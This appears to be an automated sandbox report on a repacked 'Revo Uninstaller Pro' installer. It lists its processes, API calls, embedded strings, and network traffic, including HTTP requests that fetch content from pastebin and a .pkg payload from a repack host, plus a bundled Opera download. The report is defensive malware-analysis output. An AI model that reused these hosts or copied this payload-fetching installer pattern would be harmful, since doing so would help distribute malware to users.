Source: unknown; HTTPS traffic detected: 107.167.110.216:443 -> 192.168.2.9:49718 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 107.167.96.36:443 -> 192.168.2.9:49719 version: TLS 1.2
Source: Revo.Uninstaller.Pro.v5.3.4.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x64\Release\VSProjectPro\VSProjectPro64.pdbU; source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x86\Release\VSProjectPro\VSProjectPro.pdbO; source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoAppBar\x64\Release\RevoAppBar.pdb; source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000005177000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x64\Release\VSProjectPro\VSProjectPro64.pdb; source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\ognian\source\repos\revoflt\x64\Release\revoflt.pdb; source: rundll32.exe, 00000003.00000003.1633987388.000001994EEA8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoAppBar\Release\RevoAppBar.pdb; source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000033DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoUninProPort\Release\RevoUPPort.pdb; source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: installer.exe.pdb; source: setup.exe, 00000021.00000000.2125308793.0000000000D28000.00000002.00000001.01000000.00000019.sdmp
Source: Binary string: c:\minispy\filter\objfre_wlh_x86\i386\revoflt.pdb; source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Work\VSRevo\Windows\Projects\RUExt\build\x86\Release\RUExt\RUExt.pdb; source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x86\Release\VSProjectPro\VSProjectPro.pdb; source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoCmd\Release\RevoCmd.pdb; source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\minispy\filter\objfre_wlh_x86\i386\revoflt.pdb2; source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoCmd\x64\Release\RevoCmd.pdb; source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\ognian\source\repos\revoflt\Release\revoflt.pdb; source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Code function: 0_2_00402930 FindFirstFileW,0_2_00402930
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Code function: 0_2_004069FF FindFirstFileW,FindClose,0_2_004069FF
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Code function: 0_2_00405DAE CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405DAE
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002EA2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,16_2_002EA2DF
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002FAFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,16_2_002FAFB9
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_00309FD3 FindFirstFileExA,16_2_00309FD3
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Code function: 27_2_004069FF FindFirstFileW,FindClose,27_2_004069FF
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Code function: 27_2_00405DAE CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,27_2_00405DAE
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Code function: 27_2_00402930 FindFirstFileW,27_2_00402930
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | File opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl32.DllA\OpenSSL32.DllA\
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | File opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | File opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | File opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | File opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl32.DllA\
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | File opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\

        Networking

        Source: unknown | DNS query: name: pastebin.com
        Source: Joe Sandbox View | IP Address: 104.20.4.235
        Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global traffic | HTTP traffic detected: GET /raw/vkwZzU9B HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: pastebin.com Connection: Keep-Alive Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /tsjtmfdm.pkg HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: mail.repack.me Connection: Keep-Alive Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /opera/stable/windows?utm_source=DWNLST&utm_medium=apb&utm_campaign=r10 HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: net.geo.opera.com Connection: Keep-Alive Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /me/ HTTP/1.1 User-Agent: Opera NetInstaller/115.0.5322.77 Host: autoupdate.opera.com Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /api/v2/features?country=US&language=en-GB&uuid=ef78c5bf-264b-4601-8713-cff8411ee342&product=&channel=Stable&version=115.0.5322.77 HTTP/1.1 User-Agent: Opera NetInstaller/115.0.5322.77 Host: features.opera-api2.com Cache-Control: no-cache
        Source: global traffic | HTTP traffic detected: GET /download/get/?id=69044&autoupdate=1&ni=1&stream=stable&utm_campaign=r10&utm_medium=apb&utm_source=DWNLST&niuid=5e9cd0d4-a463-4317-9584-56d207f4ea74 HTTP/1.1 User-Agent: Opera NetInstaller/115.0.5322.77 Host: download.opera.com Cache-Control: no-cache
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Googlehttps://www.bing.com/search?q=https://www.google.com/search?q=https://search.yahoo.com/search?p=Yahoohttps://duckduckgo.com/?q=DuckDuckGoSelectedEngineGeneral\WebSearchURL` equals www.yahoo.com (Yahoo)
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: MjViewTypeSort by column\RegBackup\Daily\\Steam\steam.exe--uninstall-app-id=Sort type64Microsoft .NETUpdate for Windows--profile-RedistMicrosoft Web DeployMicrosoft Visual C++Microsoft SQL ServerMicrosoft System CLRLast Full Backup/XOpenJDKURLInfoAbout /in "%s"\RevoAppBar.exe/I(*.exe;*.com;*.msi)|*.exe;*.com;*.msi|(*.*)|*.*|ModifyPathI\data\cachedata.dat\data\OLDcachedata.dathttps://www.facebook.com/pages/Revo-Uninstaller/53526911789\data\Prevcachedata.datOpen-ShellSOFTWARE\Microsoft\Installer\Products\SOFTWARE\Microsoft\Windows\CurrentVersion\App Management\ARPCache\ProductIconInstaller\Products\PotPlayerctor.dllSlowInfoCacheantamedia hotspotInstallDateSystemComponent\Installer\UserData\MsiExec.exe /X%02d.%02d.%dPublisherDisplayIconInstallLocationParentKeyName\InstallPropertiesHelpLinkCommentsSOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\WindowsInstallerSOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\\Products\cachedata.datEstimatedSizeMsiExec.exe\data\' AND RDN LIKE '' AND RPVer LIKE '%d.%dSELECT * FROM ILogs WHERE RKey=' /i /x /I /XQuietUninstallString"%s" /S %s%s /quiet%s /qn\contrast-black\.scale-400%s /S_contrast-blackx 64x 86.targetsize-256UninstallSection%d64bit32bitx-64x-86(x64 edition)(x86 edition)64 bit32 bitMicrosoft Edge WebView2 Runtimex64 editionx86 edition equals www.facebook.com (Facebook)
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ViewType\RegBackup\Daily\\Steam\steam.exe64Sort typeSort by columnMicrosoft .NETRedist--profile---uninstall-app-id=Microsoft Web DeployMicrosoft System CLRMicrosoft SQL ServerUpdate for WindowsLast Full BackupURLInfoAboutOpenJDKMicrosoft Visual C++ /in "%s"(*.exe;*.com;*.msi)|*.exe;*.com;*.msi|(*.*)|*.*|/I/XModifyPath\data\OLDcachedata.dat\data\cachedata.dat\RevoAppBar.exe\data\Prevcachedata.dathttps://www.facebook.com/pages/Revo-Uninstaller/53526911789I equals www.facebook.com (Facebook)
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.bing.com/search?q=YahooGooglehttps://www.google.com/search?q=https://duckduckgo.com/?q=General\WebSearchhttps://search.yahoo.com/search?p=DuckDuckGoSelectedEngineURL` equals www.yahoo.com (Yahoo)
        Source: global traffic | DNS traffic detected: DNS query: pastebin.com
        Source: global traffic | DNS traffic detected: DNS query: mail.repack.me
        Source: global traffic | DNS traffic detected: DNS query: net.geo.opera.com
        Source: global traffic | DNS traffic detected: DNS query: autoupdate.opera.com
        Source: global traffic | DNS traffic detected: DNS query: autoupdate.geo.opera.com
        Source: global traffic | DNS traffic detected: DNS query: desktop-netinstaller-sub.osp.opera.software
        Source: global traffic | DNS traffic detected: DNS query: features.opera-api2.com
        Source: global traffic | DNS traffic detected: DNS query: download.opera.com
        Source: global traffic | DNS traffic detected: DNS query: download3.operacdn.com
        Source: unknown | HTTP traffic detected: POST /v5/netinstaller/opera/Stable/windows/x64 HTTP/1.1 User-Agent: Opera NetInstaller/115.0.5322.77 Host: autoupdate.geo.opera.com Content-Length: 656 Cache-Control: no-cache
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http:////file:////www.web.OS
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crt0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0N
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0=
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://csrc.nist.gov/publications/drafts/800-67-rev1/SP-800-67-rev1-2_July-2011.pdfS
